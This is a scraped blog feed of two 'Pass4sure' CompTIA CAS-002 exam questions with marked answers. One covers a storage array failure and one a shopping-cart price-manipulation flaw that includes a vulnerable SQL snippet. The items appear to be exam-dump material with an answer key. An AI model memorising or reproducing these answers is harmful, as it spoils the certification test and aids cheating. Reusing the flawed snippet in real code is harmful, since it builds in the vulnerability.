Through its advocacy arm, CompTIA champions member-driven business and IT priorities that impact all information technology companies – from small managed solutions providers and software developers to large equipment manufacturers and communications service providers. CompTIA gives eyes, ears and a voice to technology companies, informing them of policy developments – and providing the means to do something about it. Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2159501906489668388.post-55789966354884858942016-01-27T22:02:00.001-08:002016-01-27T22:02:25.397-08:00Pass4sure CAS-002 Question Answer<b>The administrator is troubleshooting availability issues on an FCoE-based storage array that uses deduplication. </b><br />
<b>The single controller in the storage array has failed, so the administrator wants to move the drives to a storage array from a different manufacturer in order to access the data. Which of the following issues may potentially occur?</b><br /><br /><b>A. </b>The data may not be in a usable format. <br /><b>B.</b> The new storage array is not FCoE based. <br /><b>C. </b>The data may need a file system check. <br /><b>D. </b>The new storage array also only has a single controller.<br /><b><br />Answer: A</b>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2159501906489668388.post-31604828444597735702015-12-29T22:28:00.000-08:002015-12-29T22:28:05.650-08:00Pass4sure CAS-002 Question Answer <b>After being notified of an issue with the online shopping cart, where customers are able to arbitrarily change the price of listed items, a programmer analyzes the following piece of code used by a web based shopping cart. </b><br />
<b>SELECT ITEM FROM CART WHERE ITEM=ADDSLASHES($USERINPUT); The programmer found that every time a user adds an item to the cart, a temporary file is created on the web server /tmp directory. The temporary file has a name which is generated by concatenating the content of the $USERINPUT variable and a timestamp in the form of MM-DD-YYYY, (e.g. smartphone-12-25-2013.tmp) containing the price of the item being purchased. Which of the following is MOST likely being exploited to manipulate the price of a shopping cart’s items? </b><br /><br /><b>A.</b> Input validation <br /><b>B.</b> SQL injection <br /><b>C.</b> TOCTOU <br /><b>D.</b> Session hijacking<br /><br /><b>Answer: C</b>Unknownnoreply@blogger.com0